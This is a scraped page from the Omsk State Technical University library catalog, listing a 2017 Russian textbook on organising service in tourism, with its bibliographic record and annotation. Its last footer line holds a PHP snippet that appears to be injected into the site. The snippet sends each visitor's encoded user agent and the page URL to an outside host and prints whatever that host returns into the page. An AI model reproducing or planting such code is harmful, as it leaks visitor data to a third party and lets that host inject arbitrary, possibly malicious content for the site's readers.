Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

110 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=94436BF2-AB5A-3A23-0129-F3A4CB31DA49$")И(("UDC=338.48$")ИЛИ("UDC=796.5$")ИЛИ("UDC=64$")ИЛИ("UDC=332.87$")ИЛИ("UDC=658.64$"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
94436BF2-AB5A-3A23-0129-F3A4CB31DA49
(Нет сведений об экземплярах)
94436BF2-AB5A-3A23-0129-F3A4CB31DA49
ББК 65.433/Д42
Джум, Татьяна Александровна.
Организация сервисного обслуживания в туризме [Текст] / Т. А. Джум, С. А. Ольшанская. - М. : Магистр : ИНФРА-М, 2017. - 365, [1] с. : рис., табл. - (Бакалавриат). - Библиогр.: с. 344-345. - ISBN 978-5-9776-0329-4. - ISBN 978-5-16-010190-3 : 954.00 р.
УДК 640.4
ББК 65.433.1я73

Рубрики:
Гостиничное дело -- Учебники и пособия
Туризм -- Сервисное обслуживание -- Организация -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- ТУРИСТСКАЯ -- ИНДУСТРИЯ -- РЕКРЕАЦИОННОЕ -- ОБСЛУЖИВАНИЕ -- ТУРОПЕРАТОР -- ТУРАГЕНТСТВО -- ТУРИСТ -- ТРАНСПОРТ -- ГОСТИНИЦА -- ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ -- РАЗВЛЕЧЕНИЕ -- РЕСТОРАННЫЙ -- БИЗНЕС
Аннотация: Настоящее пособие по технологии и организации обслуживания в туризме разработано на кафедре сервиса и туризма НЧОУ ВПО "Кубанского социально-экономического института".
Цель настоящего пособия - приобретение студентами теоретических знаний и практических навыков оказания услуг на предприятиях туристской индустрии. Изучение представленного материала должно способствовать формированию у студентов нового организационного мышления. Особенностью учебного пособия является его прикладной характер, по ходу его изучения обращается внимание на то, где и когда изучаемые теоретические положения и практические навыки могут быть использованы в практической деятельности.
Доп. точки доступа:
Ольшанская, Светлана Алексеевна

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Настоящее пособие по технологии и организации обслуживания в туризме разработано на кафедре сервиса и туризма НЧОУ ВПО "Кубанского социально-экономического института".

Цель настоящего пособия - приобретение студентами теоретических знаний и практических навыков оказания услуг на предприятиях туристской индустрии. Изучение представленного материала должно способствовать формированию у студентов нового организационного мышления. Особенностью учебного пособия является его прикладной характер, по ходу его изучения обращается внимание на то, где и когда изучаемые теоретические положения и практические навыки могут быть использованы в практической деятельности.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2999 - 26.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.82 с.14 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;